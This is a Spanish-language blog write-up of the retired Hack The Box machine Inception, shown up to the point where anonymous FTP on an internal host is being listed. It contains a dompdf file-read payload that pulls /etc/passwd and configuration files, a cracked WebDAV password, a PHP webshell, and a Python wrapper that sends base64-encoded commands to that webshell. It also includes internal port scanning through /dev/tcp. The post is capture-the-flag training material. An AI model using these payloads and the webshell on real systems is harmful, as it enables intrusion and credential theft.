<!DOCTYPE html>
<html lang="es"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.8.0 -->
<title>Maquina Retirada Inception de Hack The Box (Necesario VIP) | Pirrandi Blog</title>
<meta name="generator" content="Jekyll v3.9.3" />
<meta property="og:title" content="Maquina Retirada Inception de Hack The Box (Necesario VIP)" />
<meta name="author" content="Pirrandi" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="En esta ocasion empezaremos con el Writeup de la maquina de HackTheBox llamada INCEPTION" />
<meta property="og:description" content="En esta ocasion empezaremos con el Writeup de la maquina de HackTheBox llamada INCEPTION" />
<link rel="canonical" href="http://localhost:4000/2021/11/02/Inception-HTB.html" />
<meta property="og:url" content="http://localhost:4000/2021/11/02/Inception-HTB.html" />
<meta property="og:site_name" content="Pirrandi Blog" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2021-11-02T00:00:00-03:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Maquina Retirada Inception de Hack The Box (Necesario VIP)" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"Pirrandi"},"dateModified":"2021-11-02T00:00:00-03:00","datePublished":"2021-11-02T00:00:00-03:00","description":"En esta ocasion empezaremos con el Writeup de la maquina de HackTheBox llamada INCEPTION","headline":"Maquina Retirada Inception de Hack The Box (Necesario VIP)","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/2021/11/02/Inception-HTB.html"},"url":"http://localhost:4000/2021/11/02/Inception-HTB.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/css/style.css">
  <link rel="icon" type="image/png" href="/assets/favicon.png" /><link type="application/atom+xml" rel="alternate" href="http://localhost:4000/feed.xml" title="Pirrandi Blog" /></head>
<body><div class="site-header">
  <div class="wrapper">
    <a class="site-title" rel="author" href="/">Pirrandi Blog<b class="command_prompt"></b><b class="blinking_cursor">_</b></a>
    <span class="social_links">
        <a class="color--hover" href=""><i class="fab fa-"></i></a><a class="color--hover" href=""><i class="fab fa-"></i></a><a class="color--hover" href=""><i class="fab fa-"></i></a>
    </span>
  </div>
</div>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        
  <div class="author-box">
    
    
        <img src="" class="author-avatar" alt="Avatar" />
    
Este es mi blog personal sobre Conceptos Hacking Etico // HTB // TryHackMe // Resumenes de Hacking // Herramientas para distintas tareas.

</div>


<div class="post">
  <h1 class="post-title">Maquina Retirada Inception de Hack The Box (Necesario VIP)</h1>
  
  <div class="post-tags">
     
      <a class="tag" href="/tag/HTB,/">HTB,</a>
      
      <a class="tag" href="/tag/dompdf,/">dompdf,</a>
      
      <a class="tag" href="/tag/Remote/">Remote</a>
      
      <a class="tag" href="/tag/File/">File</a>
      
      <a class="tag" href="/tag/Read,/">Read,</a>
      
      <a class="tag" href="/tag/squidproxy,/">squidproxy,</a>
      
      <a class="tag" href="/tag/webdav,/">webdav,</a>
      
      <a class="tag" href="/tag/CronTabs,/">CronTabs,</a>
      
      <a class="tag" href="/tag/Web/">Web</a>
      
      <a class="tag" href="/tag/Hacking,/">Hacking,</a>
      
      <a class="tag" href="/tag/Maquinas/">Maquinas</a>
      
      <a class="tag" href="/tag/Retiradas,/">Retiradas,</a>
      
      <a class="tag" href="/tag/Writeup/">Writeup</a>
      
  </div>
  
  <div class="post-date">Published on 02 Nov 2021</div>
  
  <noscript>
    <div class="post-description">En esta ocasion empezaremos con el Writeup de la maquina de HackTheBox llamada INCEPTION</div>
  </noscript>
  <div id="animated-post-description" class="post-description" style="display: none;"></div>
  
  <h1 id="inception--hack-the-box">Inception ~ Hack The Box</h1>

<p>Realizamos el Primer escaneo con Nmap</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># nmap -p- --open -sS --min-rate 5000 -Pn -n -vvv 10.10.10.67</span>
</code></pre></div></div>
<p>Realizamos el segundo escaneo para averiguar la version y servicios en los puerto abiertos</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># nmap -sC -sV -p80,3128 -Pn -n -v 10.10.10.67</span>

PORT     STATE SERVICE    VERSION
80/tcp   open  http       Apache httpd 2.4.18 <span class="o">((</span>Ubuntu<span class="o">))</span>
| http-methods: 
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 <span class="o">(</span>Ubuntu<span class="o">)</span>
|_http-title: Inception
3128/tcp open  http-proxy Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
</code></pre></div></div>

<p>Procedemos a enumerar el servicio <code class="language-plaintext highlighter-rouge">http</code> con la herramienta <code class="language-plaintext highlighter-rouge">whatweb</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># whatweb http://10.10.10.67                                                                                                                                                     </span>
http://10.10.10.67 <span class="o">[</span>200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 <span class="o">(</span>Ubuntu<span class="o">)]</span>, IP[10.10.10.67], Script, Title[Inception]
</code></pre></div></div>
<p>Procedemos a hechar un ojo a la pagina web y al codigo fuente de la misma.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl <span class="nt">-s</span> <span class="nt">-X</span> GET <span class="s2">"http://10.10.10.67/"</span>
&lt;<span class="o">!</span><span class="nt">--</span> Todo: <span class="nb">test </span>dompdf on php 7.x <span class="nt">--</span><span class="o">&gt;</span>
</code></pre></div></div>
<p>Encontramos al final de codigo fuente algo sobre <code class="language-plaintext highlighter-rouge">DOMPDF</code>
Investigamos a nivel google que es DOMPDF:   <code class="language-plaintext highlighter-rouge">DOMPDF es un conversor de HTML a PDF escrito en PHP</code>
Buscamos Exploits Github para DOMPDF:   Encontramos este exploit de Arbitrary File Read en github– <code class="language-plaintext highlighter-rouge">https://github.com/defarbs/dompdf-exploit</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl <span class="nt">-s</span> <span class="nt">-X</span> GET <span class="s2">"10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd"</span>
</code></pre></div></div>

<p>Tratamos el <code class="language-plaintext highlighter-rouge">Output del comando anterior para verlo todo guay y decodificarlo</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># curl -s -X GET "10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd" | grep -E '[.*?]' | grep -v  '%' | grep -v '/MediaBox' | grep -v '0.000' | awk '{print $8}' | tr -d '[()]' | base64 -d</span>

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
<span class="nb">sync</span>:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System <span class="o">(</span>admin<span class="o">)</span>:/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
cobb:x:1000:1000::/home/cobb:/bin/bash
</code></pre></div></div>
<p>Identificamos un usuario llamado <code class="language-plaintext highlighter-rouge">cobb</code> 
Ahora que tenemos la vulnerabilidad de leer archivos de la maquina victima vamos a buscar por recursos interesantes en el sistema.</p>

<p>Enumerando el sistema atraves de un script en bash</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>───────┬────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
       │ File: Dompdf-RemoteFileRead.sh
───────┼────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
   1   │ <span class="c">#/bin/bash</span>
   2   │ 
   3   │ <span class="c"># Arbitrary File Read Machine Inception HTB HacktheBox</span>
   4   │ 
   5   │ <span class="nv">file</span><span class="o">=</span><span class="s1">'$1'</span>
   6   │ 
   7   │ <span class="k">if </span>file <span class="o">!=</span> <span class="s1">'$0'</span> 2&gt;/dev/null<span class="p">;</span> <span class="k">then
   </span>8   │ 
   9   │     curl <span class="nt">-s</span> <span class="nt">-X</span> GET <span class="s2">"10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=</span><span class="nv">$1</span><span class="s2">"</span> | <span class="nb">grep</span> <span class="nt">-E</span> <span class="s1">'[.*?]'</span> | <span class="nb">grep</span> <span class="nt">-v</span>  <span class="s1">'%'</span> | <span class="nb">grep</span> <span class="nt">-v</span>  <span class="s1">'/MediaBox'</span> | <span class="nb">grep</span> <span class="nt">-v</span> <span class="s1">'0.000'</span> | <span class="nb">awk</span> <span class="s1">'{print $
       │ 8}'</span> | <span class="nb">tr</span> <span class="nt">-d</span> <span class="s1">'[()]'</span> | <span class="nb">base64</span> <span class="nt">-d</span>
  10   │ 
  11   │ <span class="k">fi</span>
───────┴────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
</code></pre></div></div>
<p>Procedemos a enumerar el la ruta <code class="language-plaintext highlighter-rouge">/etc/sites-availble/</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># ./Dompdf-RemoteFileRead.sh /etc/apache2/sites-available/000-default.conf                                                                                                                                 </span>
&lt;VirtualHost <span class="k">*</span>:80&gt;
        <span class="c"># The ServerName directive sets the request scheme, hostname and port that</span>
        <span class="c"># the server uses to identify itself. This is used when creating</span>
        <span class="c"># redirection URLs. In the context of virtual hosts, the ServerName</span>
        <span class="c"># specifies what hostname must appear in the request's Host: header to</span>
        <span class="c"># match this virtual host. For the default virtual host (this file) this</span>
        <span class="c"># value is not decisive as it is used as a last resort host regardless.</span>
        <span class="c"># However, you must set it for any further virtual host explicitly.</span>
        <span class="c">#ServerName www.example.com</span>

        ServerAdmin webmaster@localhost
        DocumentRoot /var/www/html

        <span class="c"># Available loglevels: trace8, ..., trace1, debug, info, notice, warn,</span>
        <span class="c"># error, crit, alert, emerg.</span>
        <span class="c"># It is also possible to configure the loglevel for particular</span>
        <span class="c"># modules, e.g.</span>
        <span class="c">#LogLevel info ssl:warn</span>

        ErrorLog <span class="k">${</span><span class="nv">APACHE_LOG_DIR</span><span class="k">}</span>/error.log
        CustomLog <span class="k">${</span><span class="nv">APACHE_LOG_DIR</span><span class="k">}</span>/access.log combined

        <span class="c"># For most configuration files from conf-available/, which are</span>
        <span class="c"># enabled or disabled at a global level, it is possible to</span>
        <span class="c"># include a line for only one particular virtual host. For example the</span>
        <span class="c"># following line enables the CGI configuration for this host only</span>
        <span class="c"># after it has been globally disabled with "a2disconf".</span>
        <span class="c">#Include conf-available/serve-cgi-bin.conf</span>
        Alias /webdav_test_inception /var/www/html/webdav_test_inception
        &lt;Location /webdav_test_inception&gt;
                Options FollowSymLinks
                DAV On
                AuthType Basic
                AuthName <span class="s2">"webdav test credential"</span>
                AuthUserFile <span class="s2">"/var/www/html/webdav_test_inception/webdav.passwd"</span>
                Require valid-user
        &lt;/Location&gt;
&lt;/VirtualHost&gt;

<span class="c"># vim: syntax=apache ts=4 sw=4 sts=4 sr noet</span>
</code></pre></div></div>

<p>Encontramos la ruta a  <code class="language-plaintext highlighter-rouge">/webdav_test_inception/webdav.passwd</code>
Usamos nuestro script para visualizar el archivo en la ruta <code class="language-plaintext highlighter-rouge">/var/www/html/webdav_test_inception/webdav.passwd</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># ./Dompdf-RemoteFileRead.sh /var/www/html/webdav_test_inception/webdav.passwd                                                                                                   </span>

<span class="s2">"webdav_tester"</span>: <span class="s2">"</span><span class="nv">$apr1$8rO7Smi4$yqn7H</span><span class="s2">.GvJFtsTou1a7VME0"</span>
</code></pre></div></div>
<p>Encontramos un hash que vamos a intentar romper con john:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># john --wordlist=/usr/share/wordlists/rockyou.txt hash</span>
<span class="c"># john --show hash                                                                                                                                                               </span>

<span class="s2">"webdav_tester"</span>: <span class="s2">"babygurl69"</span>

1 password <span class="nb">hash </span>cracked, 0 left
</code></pre></div></div>

<p>Como vemos tenemos un webdav podemos intentar usar la herramienta <code class="language-plaintext highlighter-rouge">cadaver</code> para subir archivos atraves del <code class="language-plaintext highlighter-rouge">webdav</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cadaver http://10.10.10.67/webdav_test_inception/
Nombre de usuario: webdav_tester
Contraseña: 

dav:/webdav_test_inception/&gt; <span class="nb">ls
</span>Listando colección <span class="sb">`</span>/webdav_test_inception/<span class="s1">': exitoso.
        webdav.passwd                         52  nov  8  2017

dav:/webdav_test_inception/&gt; put webshell.php
Transferiendo webshell.php a '</span>/webdav_test_inception/webshell.php<span class="s1">':
 Progreso: [                              ]   0,0% of 36 bytes Progreso: [=============================&gt;] 100,0% of 36 bytes exitoso.
</span></code></pre></div></div>

<p>Nos subimos el siguiente script en <code class="language-plaintext highlighter-rouge">webshell.php</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># cat webshell.php                                                                                                                                                              </span>
&lt;?php
        system<span class="o">(</span><span class="nv">$_REQUEST</span><span class="o">[</span><span class="s1">'cmd'</span><span class="o">])</span><span class="p">;</span>
?&gt;
</code></pre></div></div>

<p>Nos autenticamos al webdav por http y procedemos a apuntar al script webshell.php almacenado en el webdav</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://10.10.10.67/webdav_test_inception/webshell.php?cmd<span class="o">=</span><span class="nb">whoami
</span>www-data
</code></pre></div></div>

<p>Procedemos a intentar ganar acceso a la maquina desde nuestra webshell, pero vemos que por IPTABLES estan todas las conexiones interceptadas para que no se pueda.
Asique hacemos uso del concepto Over-HTTP-TTY de s4vitar para jugar con mkfifo</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://github.com/s4vitar/ttyoverhttp
</code></pre></div></div>
<p>Nos descargamos el repositorio y realizamos una modificacion fijandonos en que tenemos una Cookie de Seesion</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Authorization: Basic d2ViZGF2X3Rlc3RlcjpiYWJ5Z3VybDY5
</code></pre></div></div>
<p>Modificamos lo siguiente para proporcionar atraves de la cabecera <code class="language-plaintext highlighter-rouge">headers</code> la <code class="language-plaintext highlighter-rouge">coockie</code></p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">RunCmd</span><span class="p">(</span><span class="n">cmd</span><span class="p">):</span>
        <span class="n">cmd</span> <span class="o">=</span> <span class="n">cmd</span><span class="p">.</span><span class="n">encode</span><span class="p">(</span><span class="s">'utf-8'</span><span class="p">)</span>
        <span class="n">cmd</span> <span class="o">=</span> <span class="n">b64encode</span><span class="p">(</span><span class="n">cmd</span><span class="p">).</span><span class="n">decode</span><span class="p">(</span><span class="s">'utf-8'</span><span class="p">)</span>
        <span class="n">payload</span> <span class="o">=</span> <span class="p">{</span>
                <span class="s">'cmd'</span> <span class="p">:</span> <span class="s">'echo "%s" | base64 -d | sh'</span> <span class="o">%</span><span class="p">(</span><span class="n">cmd</span><span class="p">)</span>
                <span class="p">}</span>

        <span class="n">headers</span> <span class="o">=</span> <span class="p">{</span>
                <span class="s">'Authorization'</span><span class="p">:</span> <span class="s">'Basic d2ViZGF2X3Rlc3RlcjpiYWJ5Z3VybDY5'</span>
                <span class="p">}</span>

        <span class="n">result</span> <span class="o">=</span> <span class="p">(</span><span class="n">requests</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="s">'http://10.10.10.67/webdav_test_inception/webshell.php'</span><span class="p">,</span> <span class="n">params</span><span class="o">=</span><span class="n">payload</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">,</span> <span class="n">timeout</span><span class="o">=</span><span class="mi">5</span><span class="p">).</span><span class="n">text</span><span class="p">).</span><span class="n">strip</span><span class="p">()</span>
        <span class="k">return</span> <span class="n">result</span>

<span class="k">def</span> <span class="nf">WriteCmd</span><span class="p">(</span><span class="n">cmd</span><span class="p">):</span>
        <span class="n">cmd</span> <span class="o">=</span> <span class="n">cmd</span><span class="p">.</span><span class="n">encode</span><span class="p">(</span><span class="s">'utf-8'</span><span class="p">)</span>
        <span class="n">cmd</span> <span class="o">=</span> <span class="n">b64encode</span><span class="p">(</span><span class="n">cmd</span><span class="p">).</span><span class="n">decode</span><span class="p">(</span><span class="s">'utf-8'</span><span class="p">)</span>
        <span class="n">payload</span> <span class="o">=</span> <span class="p">{</span>
                <span class="s">'cmd'</span> <span class="p">:</span> <span class="s">'echo "%s" | base64 -d &gt; %s'</span> <span class="o">%</span> <span class="p">(</span><span class="n">cmd</span><span class="p">,</span> <span class="n">stdin</span><span class="p">)</span>
        <span class="p">}</span>

        <span class="n">headers</span> <span class="o">=</span> <span class="p">{</span>
                <span class="s">'Authorization'</span><span class="p">:</span> <span class="s">'Basic d2ViZGF2X3Rlc3RlcjpiYWJ5Z3VybDY5'</span>
        <span class="p">}</span>

        <span class="n">result</span> <span class="o">=</span> <span class="p">(</span><span class="n">requests</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="s">'http://10.10.10.67/webdav_test_inception/webshell.php'</span><span class="p">,</span> <span class="n">params</span><span class="o">=</span><span class="n">payload</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">,</span> <span class="n">timeout</span><span class="o">=</span><span class="mi">5</span><span class="p">).</span><span class="n">text</span><span class="p">).</span><span class="n">strip</span><span class="p">()</span>
        <span class="k">return</span> <span class="n">result</span>
</code></pre></div></div>
<p>Y ya si lo lanzamos obtenemos una FULL TTY desde una webshell, jugando con mkfifo.</p>

<h1 id="intrusion-atraves-de-la-utilidad-full-tty-over-http">Intrusion atraves de la utilidad FULL-TTY-Over-HTTP</h1>

<p>Lanzamos el script:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># rlwrap python3 tty_over_http.py                                                                                                                                                                            1 ⚙</span>
<span class="nb">whoami
</span>www-data
<span class="nb">hostname</span> <span class="nt">-I</span>
192.168.0.10
<span class="o">&gt;</span> 
</code></pre></div></div>
<p>Enumeramos el sistema en busca de credenciales e usuarios.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">pwd</span>
/var/www/html
<span class="nb">ls</span> <span class="nt">-l</span>
total 8044
<span class="nt">-rw-r--r--</span> 1 root     root       17128 May  7  2017 LICENSE.txt
<span class="nt">-rw-r--r--</span> 1 root     root        2307 May  7  2017 README.txt
drwxr-xr-x 6 root     root        4096 May  7  2017 assets
drwxrwxr-x 4 root     root        4096 Nov  6  2017 dompdf
drwxr-xr-x 2 root     root        4096 May  7  2017 images
<span class="nt">-rw-r--r--</span> 1 root     root        2877 Nov  6  2017 index.html
<span class="nt">-rw-r--r--</span> 1 root     root     8184961 Oct 31  2017 latest.tar.gz
drwxr-xr-x 2 www-data www-data    4096 Nov  2 12:36 webdav_test_inception
drwxr-xr-x 5 root     root        4096 Nov  6  2017 wordpress_4.8.3
</code></pre></div></div>

<p>Verificando usuarios en el sistema:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">grep</span> <span class="s2">"sh"</span> /etc/passwd
<span class="o">&gt;</span> root:x:0:0:root:/root:/bin/bash
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
cobb:x:1000:1000::/home/cobb:/bin/bash
</code></pre></div></div>

<p>Buscamos en el directorio <code class="language-plaintext highlighter-rouge">wordpress_4.8.3</code> y encontramos un archivo <code class="language-plaintext highlighter-rouge">wp-config.php</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="s2">"root"</span> : <span class="s2">"VwPddNh7xMZyDQoByQL4"</span>
</code></pre></div></div>

<h1 id="conectandonos-a-la-maquina-por-ssh-gracias-al-squid-proxy">Conectandonos a la maquina por SSH gracias al Squid Proxy</h1>
<p>Como veiamos antes tenemos el puerto 3128 abierto con un servicio de <code class="language-plaintext highlighter-rouge">Squid Proxy</code>
Procedemos a configurar el archivo de proxychains4.conf para apuntar a la maquina victima. 
Modificamos los siguiente: 
Comentamos la primera linea que se ve aqui y añadimos la ultima linea al codigo, justo al final del todo en el archivo de configuracion.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># nano /etc/proxychains4.conf</span>

<span class="c">#socks4         127.0.0.1 9050</span>
http    10.10.10.67 3128
</code></pre></div></div>

<p>Ahora ya podemos usar nmap para verificar que pasamos por el squid proxy con proxychains</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># proxychains nmap -p22 -sT -v -n 127.0.0.1</span>
<span class="o">[</span>proxychains] config file found: /etc/proxychains4.conf
<span class="o">[</span>proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
<span class="o">[</span>proxychains] DLL init: proxychains-ng 4.14
Starting Nmap 7.91 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2021-11-02 20:19 CET
Initiating Connect Scan at 20:19
Scanning 127.0.0.1 <span class="o">[</span>1 port]
<span class="o">[</span>proxychains] Strict chain  ...  10.10.10.67:3128  ...  127.0.0.1:22  ...  OK
Discovered open port 22/tcp on 127.0.0.1
Completed Connect Scan at 20:19, 0.17s elapsed <span class="o">(</span>1 total ports<span class="o">)</span>
Nmap scan report <span class="k">for </span>127.0.0.1
Host is up <span class="o">(</span>0.17s latency<span class="o">)</span><span class="nb">.</span>

PORT   STATE SERVICE
22/tcp open  ssh

Read data files from: /usr/bin/../share/nmap
</code></pre></div></div>

<p>Pudiendo asi pues alcanzar el servicio ssh para conectarnos como el usuario <code class="language-plaintext highlighter-rouge">cobb</code> con la credencial obtenida anteriormente</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># proxychains ssh cobb@127.0.0.1           </span>
<span class="o">[</span>proxychains] config file found: /etc/proxychains4.conf
<span class="o">[</span>proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
<span class="o">[</span>proxychains] DLL init: proxychains-ng 4.14
<span class="o">[</span>proxychains] Strict chain  ...  10.10.10.67:3128  ...  127.0.0.1:22  ...  OK
cobb@127.0.0.1<span class="s1">'s password: 
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-101-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
Last login: Thu Nov 30 20:06:16 2017 from 127.0.0.1
cobb@Inception:~$ 
</span></code></pre></div></div>

<p>Sacamos la flag <code class="language-plaintext highlighter-rouge">user.txt</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cobb@Inception:~<span class="nv">$ </span><span class="nb">cat </span>user.txt 
4a8bc2d686d093f3f8axxxxxxxxxxxxxxx
</code></pre></div></div>

<h1 id="escalando-privilegios-desde-un-contenedor">Escalando Privilegios desde un Contenedor</h1>
<p>Enumerando el posibles hosts en el segmento de red en el que se encuentra el contenedor</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">#!/bin/bash</span>
<span class="c"># Programa para enumerar los hosts de tu segmento de red </span>

<span class="k">for </span>i <span class="k">in</span> <span class="si">$(</span><span class="nb">seq </span>1 254<span class="si">)</span> <span class="p">;</span> <span class="k">do
        </span><span class="nb">timeout </span>1 bash <span class="nt">-c</span> <span class="s2">"ping -c 1 192.168.0.</span><span class="nv">$i</span><span class="s2">"</span> <span class="o">&gt;</span>/dev/null 2&gt;&amp;1 <span class="o">&amp;&amp;</span> <span class="nb">echo</span> <span class="s2">"[*] EL Equipo: 192.168.0.</span><span class="nv">$i</span><span class="s2"> esta Activo"</span> &amp;

<span class="k">done</span>
</code></pre></div></div>
<p>Porcedemos a ejecutar el script en bash para identificar hosts</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cobb@Inception:~<span class="nv">$ </span>./host.sh 
<span class="o">[</span><span class="k">*</span><span class="o">]</span> EL Equipo: 192.168.0.10 esta Activo
<span class="o">[</span><span class="k">*</span><span class="o">]</span> EL Equipo: 192.168.0.1 esta Activo
</code></pre></div></div>

<p>Procedemos a modificar el script para descubrir puertos en el activo encontrado <code class="language-plaintext highlighter-rouge">192.168.0.1</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">#!/bin/bash</span>
<span class="c"># Programa para enumerar los hosts de tu segmento de red </span>

<span class="k">for </span>port <span class="k">in</span> <span class="si">$(</span><span class="nb">seq </span>1 65535<span class="si">)</span> <span class="p">;</span> <span class="k">do
        </span><span class="nb">timeout </span>1 bash <span class="nt">-c</span> <span class="s2">"echo '' &gt; /dev/tcp/192.168.0.1/</span><span class="nv">$port</span><span class="s2">"</span> <span class="o">&gt;</span>/dev/null 2&gt;&amp;1 <span class="o">&amp;&amp;</span> <span class="nb">echo</span> <span class="s2">"[*] EL Puerto: </span><span class="nv">$port</span><span class="s2"> esta Activo"</span> &amp;

<span class="k">done</span>
</code></pre></div></div>
<p>Ejecutamos el script modificado para encontrar puertos abiertos</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cobb@Inception:~<span class="nv">$ </span>./host.sh 
<span class="o">[</span><span class="k">*</span><span class="o">]</span> EL Puerto: 22 esta Activo
<span class="o">[</span><span class="k">*</span><span class="o">]</span> EL Puerto: 53 esta Activo
<span class="o">[</span><span class="k">*</span><span class="o">]</span> EL Puerto: 21 esta Activo
</code></pre></div></div>

<p>Enuramos 3 puertos abiertos entre ellos el puerto 21 FTP, vamos a empezar enumerando este servicio e intentando conectarnos</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cobb@Inception:~<span class="nv">$ </span>ftp 192.168.0.1
Connected to 192.168.0.1.
220 <span class="o">(</span>vsFTPd 3.0.3<span class="o">)</span>
Name <span class="o">(</span>192.168.0.1:cobb<span class="o">)</span>: anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system <span class="nb">type </span>is UNIX.
Using binary mode to transfer files.
ftp&gt; <span class="nb">ls
</span>200 PORT <span class="nb">command </span>successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Nov 30  2017 bin
drwxr-xr-x    3 0        0            4096 Nov 30  2017 boot
drwxr-xr-x   19 0        0            3920 Nov 03 09:32 dev
drwxr-xr-x   93 0        0            4096 Nov 30  2017 etc
drwxr-xr-x    2 0        0            4096 Nov 06  2017 home
lrwxrwxrwx    1 0        0              33 Nov 30  2017 initrd.img -&gt; boot/initrd.img-4.4.0-101-generic
lrwxrwxrwx    1 0        0              32 Nov 06  2017 initrd.img.old -&gt; boot/initrd.img-4.4.0-98-generic
drwxr-xr-x   22 0        0            4096 Nov 30  2017 lib
drwxr-xr-x    2 0        0            4096 Oct 30  2017 lib64
drwx------    2 0        0           16384 Oct 30  2017 lost+found
drwxr-xr-x    3 0        0            4096 Oct 30  2017 media
drwxr-xr-x    2 0        0            4096 Aug 01  2017 mnt
drwxr-xr-x    2 0        0            4096 Aug 01  2017 opt
dr-xr-xr-x  198 0        0               0 Nov 03 09:32 proc
drwx------    6 0        0            4096 Nov 08  2017 root
drwxr-xr-x   26 0        0             920 Nov 03 09:32 run
drwxr-xr-x    2 0        0           12288 Nov 30  2017 sbin
drwxr-xr-x    2 0        0            4096 Apr 29  2017 snap
drwxr-xr-x    3 0        0            4096 Nov 06  2017 srv
dr-xr-xr-x   13 0        0               0 Nov 03 09:32 sys
drwxrwxrwt   10 0        0            4096 Nov 03 10:00 tmp
drwxr-xr-x   10 0        0            4096 Oct 30  2017 usr
drwxr-xr-x   13 0        0            4096 Oct 30  2017 var
lrwxrwxrwx    1 0        0              30 Nov 30  2017 vmlinuz -&gt; boot/vmlinuz-4.4.0-101-generic
lrwxrwxrwx    1 0        0              29 Nov 06  2017 vmlinuz.old -&gt; boot/vmlinuz-4.4.0-98-generic
226 Directory send OK.
</code></pre></div></div>
